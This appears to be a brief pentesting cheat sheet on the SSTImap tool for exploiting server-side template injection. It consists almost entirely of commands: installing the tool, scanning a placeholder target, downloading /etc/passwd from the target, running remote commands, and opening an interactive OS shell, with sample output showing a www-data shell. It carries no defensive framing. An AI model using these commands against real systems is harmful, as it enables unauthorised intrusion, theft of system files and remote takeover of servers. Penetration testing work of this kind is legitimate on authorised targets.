Last updated
Last updated
root@oco:~$ git clone https://github.com/vladko312/SSTImap
root@oco:~$ cd SSTImap
root@oco:~$ pip3 install -r requirements.txt
root@oco:~$ python3 sstimap.py #automatically identify SSTI vulnerabilities and template engine
root@oco:~$ python3 sstimap.py -u http://{targetSite:port}/index.php?name=test
#download a remote file directly to the local machine
root@oco:~$ python3 sstimap.py -u http://{targetSite:port}/index.php?name=test -D '/etc/passwd' './passwd'
* the -D is used to download remote files
#RCE
root@oco:~$ python3 sstimap.py -u http://{targetSite:port}/index.php?name=test -S id
* the -S is used to execute remote cmds
root@oco:~$ python3 sstimap.py -u http://{targetSite:port}/index.php?name=test --os-shell
* the --os-shell is used to obtain an interactive shell
Linux $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux $ whoami
www-data